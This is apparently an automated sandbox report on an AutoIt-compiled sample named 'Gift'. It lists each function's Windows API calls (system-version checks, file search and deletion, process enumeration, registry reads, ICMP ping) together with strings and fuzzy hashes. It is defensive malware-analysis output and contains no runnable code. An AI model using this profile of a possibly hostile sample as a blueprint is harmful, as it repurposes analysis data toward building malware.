• Instruction ID: c1e21128c536d859c954660e2174484311f860b3871a081834e2a65f79436ff5
• Opcode Fuzzy Hash: 26604b693f789dbd8b8d5e23dfbbe1706b49a099ebef9434f0b7feeb921b2f13
• Instruction Fuzzy Hash: 525139309B4288AACF17EBB1DC16DFE7B7CAF05344F5044A6F591621A2CBB15925CF20

Control-flow Graph

control_flow_graph: basic-block edge list for the function starting at 2e5d13-2e5d73 (calls 2e1207, GetVersionExW, 2e1821, 2e1981, 2e133d, GetCurrentProcess, IsWow64Process, 2e55f0, GetNativeSystemInfo, FreeLibrary, GetSystemInfo); the rendered graph is not reproduced here.
                                                                          APIs
                                                                          • GetVersionExW.KERNEL32(?), ref: 002E5D40
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          • GetCurrentProcess.KERNEL32(?,00360A18,00000000,00000000,?), ref: 002E5E07
                                                                          • IsWow64Process.KERNEL32(00000000), ref: 002E5E0E
                                                                          • GetNativeSystemInfo.KERNEL32(00000000), ref: 002E5E54
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 002E5E5F
                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 002E5E90
                                                                          • GetSystemInfo.KERNEL32(00000000), ref: 002E5E9C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                          • String ID:
                                                                          • API String ID: 1986165174-0
                                                                          • Opcode ID: 839e695e6b2400138b1590df7f766c072828ae3e3dc83e046ff0a4ab0decb38e
                                                                          • Instruction ID: de623836889b15d74890c1c39fc23c1f4d8baae15398e1cbe107bc9bd22c7054
                                                                          • Opcode Fuzzy Hash: 839e695e6b2400138b1590df7f766c072828ae3e3dc83e046ff0a4ab0decb38e
                                                                          • Instruction Fuzzy Hash: 5D91E5315A9BD0DEC732CB7995510ABFFE56F3A304BC84A9ED0C793A01D230A658C769

                                                                          Control-flow Graph

                                                                          Control-flow graph (function at 334005; basic blocks 334005-334129; calls FindFirstFileW, DeleteFileW, FindNextFileW and FindClose; graph edge list omitted)
                                                                          APIs
                                                                            • Part of subcall function 002F0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002E2A58,?,00008000), ref: 002F02A4
                                                                            • Part of subcall function 00334FEC: GetFileAttributesW.KERNEL32(?,00333BFE), ref: 00334FED
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0033407C
                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 003340CC
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003340DD
                                                                          • FindClose.KERNEL32(00000000), ref: 003340F4
                                                                          • FindClose.KERNEL32(00000000), ref: 003340FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                          • String ID: \*.*
                                                                          • API String ID: 2649000838-1173974218
                                                                          • Opcode ID: 328d56a81c331c046fbd2e138a6e7e1bf7f5a15b05bf4f5e0c5ed8f1afa2596e
                                                                          • Instruction ID: feb5955faf8e636bf25ed278e4ac67ad5ff2e4f65b9532b2d636ee07aa05fabd
                                                                          • Opcode Fuzzy Hash: 328d56a81c331c046fbd2e138a6e7e1bf7f5a15b05bf4f5e0c5ed8f1afa2596e
                                                                          • Instruction Fuzzy Hash: 743165310583859BC706EF60C8959AFB7ECBE55304F444E2DF5E582192DB70E929CB53
                                                                          APIs
                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0033416D
                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0033417B
                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0033419B
                                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 00334245
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                          • String ID:
                                                                          • API String ID: 3243318325-0
                                                                          • Opcode ID: 908dabbe8a3868d31b8d4afeabffa0f6645e73f442f9cc134cec80388c213e93
                                                                          • Instruction ID: 5da27b4d03f2bf9b88a7cc7e771f5c0ae0c5574244e8db85f3f08e57f5c56d8e
                                                                          • Opcode Fuzzy Hash: 908dabbe8a3868d31b8d4afeabffa0f6645e73f442f9cc134cec80388c213e93
                                                                          • Instruction Fuzzy Hash: 7931E3711083419FD306EF51D8C5AAFBBE8BF95340F50092DF585D21A1EBB0AA59CB92
                                                                          APIs
                                                                            • Part of subcall function 002E3740: CharUpperBuffW.USER32(?,003971DC,00000000,?,00000000,003971DC,?,002D53A5,?,?,?,?), ref: 002E375D
                                                                          • _memmove.LIBCMT ref: 002DB68A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpper_memmove
                                                                          • String ID:
                                                                          • API String ID: 2819905725-0
                                                                          • Opcode ID: 4b6af3ba10534102b7ca2932eb89ebb6a3ebd2d95df185e3411c5eef1acfe58e
                                                                          • Instruction ID: bce4b1d80c77a9a0e43981cefeecb87e31d8fd5e8dcc90d5cc63494a44e6af7b
                                                                          • Opcode Fuzzy Hash: 4b6af3ba10534102b7ca2932eb89ebb6a3ebd2d95df185e3411c5eef1acfe58e
                                                                          • Instruction Fuzzy Hash: F4A2BA70628341CFD726DF14C490B6AB7E1BF89304F16896EE89A8B351D770ED95CB82
                                                                          APIs
                                                                          • GetFileAttributesW.KERNEL32(?,0031FC86), ref: 0033495A
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0033496B
                                                                          • FindClose.KERNEL32(00000000), ref: 0033497B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                          • String ID:
                                                                          • API String ID: 48322524-0
                                                                          • Opcode ID: 920a54673cf934f64d8b6915deee6ba1551feecaf0adda7ab68699528b5b5b3f
                                                                          • Instruction ID: 37806b8426fb53ed668d8f605d592c677f52423b626678a2205bb2685e3e480a
                                                                          • Opcode Fuzzy Hash: 920a54673cf934f64d8b6915deee6ba1551feecaf0adda7ab68699528b5b5b3f
                                                                          • Instruction Fuzzy Hash: F6E0DF31810505AB82166B38EC8E8EB7B9C9F0733AF104B05F835C20E0EBB0A9448696
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0935903be2ee25fa572b20e43d0ea6d5f82179191ac0871b8d83211529ee7cac
                                                                          • Instruction ID: 1324a9fe017bd248cc81514c986e7e56d44d34fc5c05e725c21b55c72f4c44f2
                                                                          • Opcode Fuzzy Hash: 0935903be2ee25fa572b20e43d0ea6d5f82179191ac0871b8d83211529ee7cac
                                                                          • Instruction Fuzzy Hash: 8722AA74A2020ADFDB24DF54C490AAEB7B4FF09300F14816AE946AB341E771ADA1CB91
                                                                          APIs
                                                                          • timeGetTime.WINMM ref: 002DBF57
                                                                            • Part of subcall function 002D52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002D52E6
                                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 003136B5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePeekSleepTimetime
                                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                          • API String ID: 1792118007-922114024
                                                                          • Opcode ID: 31eaa8091bb30480469ed4aa48a065bb577a52d9b29d56a18e5940eaad2f69a7
                                                                          • Instruction ID: b4e0d387d1bee527761d9823e85d46be15baf353123eac22a90d049226fe5eca
                                                                          • Opcode Fuzzy Hash: 31eaa8091bb30480469ed4aa48a065bb577a52d9b29d56a18e5940eaad2f69a7
                                                                          • Instruction Fuzzy Hash: 72C29F70618341DFD72ADF14C894BAAB7E5BF88304F15891EE48A97391CB71ED94CB82

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 002D3444
                                                                          • RegisterClassExW.USER32(00000030), ref: 002D346E
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002D347F
                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 002D349C
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002D34AC
                                                                          • LoadIconW.USER32(000000A9), ref: 002D34C2
                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002D34D1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: 142e822a5fb7df11717d36ee61edebe083be3a06ede09e7989b073995ee5d1b2
                                                                          • Instruction ID: 59af350432cd0ee8c39bad18c0565a29849fdc103c9fc2c4961d3daf319f9f0a
                                                                          • Opcode Fuzzy Hash: 142e822a5fb7df11717d36ee61edebe083be3a06ede09e7989b073995ee5d1b2
                                                                          • Instruction Fuzzy Hash: F9314971858309EFDB529FA4DC8ABCABBF8FF09310F10855AE590A62A0D3B60541CF50

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 002D3444
                                                                          • RegisterClassExW.USER32(00000030), ref: 002D346E
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002D347F
                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 002D349C
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002D34AC
                                                                          • LoadIconW.USER32(000000A9), ref: 002D34C2
                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002D34D1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: fe71f73bf1e747ced525e9dcb421f47a1f004d98717ae97a961a393131731258
                                                                          • Instruction ID: ae86d61f13292d30ced970a702918b96da13f73dfb0e54306bb6b5df86219fb3
                                                                          • Opcode Fuzzy Hash: fe71f73bf1e747ced525e9dcb421f47a1f004d98717ae97a961a393131731258
                                                                          • Instruction Fuzzy Hash: 8A21E8B1924309AFDB029FA4EC8ABDE7BF8FB08700F00815AF510A62A0D7B25544CF95

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 002F00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,002E3094), ref: 002F00ED
                                                                            • Part of subcall function 002F08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,002E309F), ref: 002F08E3
                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002E30E2
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003201BA
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003201FB
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00320239
                                                                          • _wcscat.LIBCMT ref: 00320292
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                          • API String ID: 2673923337-2727554177
                                                                          • Opcode ID: 4dcb7a0b042eeb33926cfb8094c0abfde70198966f01e90243f183375fa2f9f4
                                                                          • Instruction ID: 522a091eea154a414df6a0ee2c3db120ab5fdb436305c07db2d0dfc40dfc6784
                                                                          • Opcode Fuzzy Hash: 4dcb7a0b042eeb33926cfb8094c0abfde70198966f01e90243f183375fa2f9f4
                                                                          • Instruction Fuzzy Hash: 23717D714157019AC316EF65E8819ABBBECFF86340F80492EF585C32A1EF329958CF52

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 002E5156
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 002E5165
                                                                          • LoadIconW.USER32(00000063), ref: 002E517C
                                                                          • LoadIconW.USER32(000000A4), ref: 002E518E
                                                                          • LoadIconW.USER32(000000A2), ref: 002E51A0
                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002E51C6
                                                                          • RegisterClassExW.USER32(?), ref: 002E521C
                                                                            • Part of subcall function 002D3411: GetSysColorBrush.USER32(0000000F), ref: 002D3444
                                                                            • Part of subcall function 002D3411: RegisterClassExW.USER32(00000030), ref: 002D346E
                                                                            • Part of subcall function 002D3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002D347F
                                                                            • Part of subcall function 002D3411: InitCommonControlsEx.COMCTL32(?), ref: 002D349C
                                                                            • Part of subcall function 002D3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002D34AC
                                                                            • Part of subcall function 002D3411: LoadIconW.USER32(000000A9), ref: 002D34C2
                                                                            • Part of subcall function 002D3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002D34D1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                          • String ID: #$0$AutoIt v3
                                                                          • API String ID: 423443420-4155596026
                                                                          • Opcode ID: 7724b668628541824c2fb7504d1a9cddd07166bf1b8944d52565b88ce1ad1bdf
                                                                          • Instruction ID: 576f0835b07768112b11185799c934701b05900aa44e657a15d7be65b2f774ef
                                                                          • Opcode Fuzzy Hash: 7724b668628541824c2fb7504d1a9cddd07166bf1b8944d52565b88ce1ad1bdf
                                                                          • Instruction Fuzzy Hash: DB216D70934308AFEB169FA8ED0AB9E7BB8FB08710F00455AF544A62E0C3B76550DF84

                                                                          Control-flow Graph

                                                                          • Control-flow graph (rendered image; legend: Executed / Not Executed). Entry block 345e1d-345e54; graph nodes 923-976 call WSAStartup, inet_addr, gethostbyname, IcmpCreateFile, IcmpSendEcho (two call sites), IcmpCloseHandle and WSACleanup.
                                                                          APIs
                                                                          • WSAStartup.WS2_32(00000101,?), ref: 00345E7E
                                                                          • inet_addr.WSOCK32(?,?,?), ref: 00345EC3
                                                                          • gethostbyname.WS2_32(?), ref: 00345ECF
                                                                          • IcmpCreateFile.IPHLPAPI ref: 00345EDD
                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00345F4D
                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00345F63
                                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00345FD8
                                                                          • WSACleanup.WSOCK32 ref: 00345FDE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                          • String ID: Ping
                                                                          • API String ID: 1028309954-2246546115
                                                                          • Opcode ID: c16ed29b22c87f8a461ebcc1b9ae23caa0b7c62da8977974e29a99cf8cf338bc
                                                                          • Instruction ID: 6c813b77b5b3b10d28b9da2aaa66354a80acdf477a23028943f75a132de41959
                                                                          • Opcode Fuzzy Hash: c16ed29b22c87f8a461ebcc1b9ae23caa0b7c62da8977974e29a99cf8cf338bc
                                                                          • Instruction Fuzzy Hash: 00516C31A04601DFD722AF25CC49B2AB7E4EF48710F158969F9559B2A2DB70ED14CB42

                                                                          Control-flow Graph

                                                                          • Control-flow graph (rendered image; legend: Executed / Not Executed). Entry block 2e4d83-2e4dd1; graph nodes 977-1027 call DefWindowProcW, PostQuitMessage, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, MoveWindow and SetFocus.
                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 002E4E22
                                                                          • KillTimer.USER32(?,00000001), ref: 002E4E4C
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002E4E6F
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002E4E7A
                                                                          • CreatePopupMenu.USER32 ref: 002E4E8E
                                                                          • PostQuitMessage.USER32(00000000), ref: 002E4EAF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                          • String ID: TaskbarCreated
                                                                          • API String ID: 129472671-2362178303
                                                                          • Opcode ID: 1df4597ae9625f17f95bf7d05aa2033ec7ce4e0f8b0bebad5feccfc7bd915d8a
                                                                          • Instruction ID: 47766be1071dab76ce564c8b4bf35202166eb68ee8c8dd597132cb7a71d5fea1
                                                                          • Opcode Fuzzy Hash: 1df4597ae9625f17f95bf7d05aa2033ec7ce4e0f8b0bebad5feccfc7bd915d8a
                                                                          • Instruction Fuzzy Hash: EE41E9312B8286ABDF1B7F65DC4ABBB3659F741300F880526F542916E2CBA1AC709771

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00320C5B
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          • _memset.LIBCMT ref: 002E5787
                                                                          • _wcscpy.LIBCMT ref: 002E57DB
                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002E57EB
                                                                          • __swprintf.LIBCMT ref: 00320CD1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                                          • String ID: Line %d: $AutoIt -
                                                                          • API String ID: 230667853-4094128768
                                                                          • Opcode ID: 4a9d4a7dbefa33f2fcb5569fb2adbdee87ae8a0d5a3ec4c6f7a2cea3cb694e29
                                                                          • Instruction ID: a74eac34f9bbeeacd486d046d32996c65abdbed3a50a24d6d43d831e38312111
                                                                          • Opcode Fuzzy Hash: 4a9d4a7dbefa33f2fcb5569fb2adbdee87ae8a0d5a3ec4c6f7a2cea3cb694e29
                                                                          • Instruction Fuzzy Hash: 7741E671068354AAC326EB61DC85FDFB7ECAF44354F500A2EF185920E2DF709668CB96

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 002F07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002F07EC
                                                                            • Part of subcall function 002F07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 002F07F4
                                                                            • Part of subcall function 002F07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002F07FF
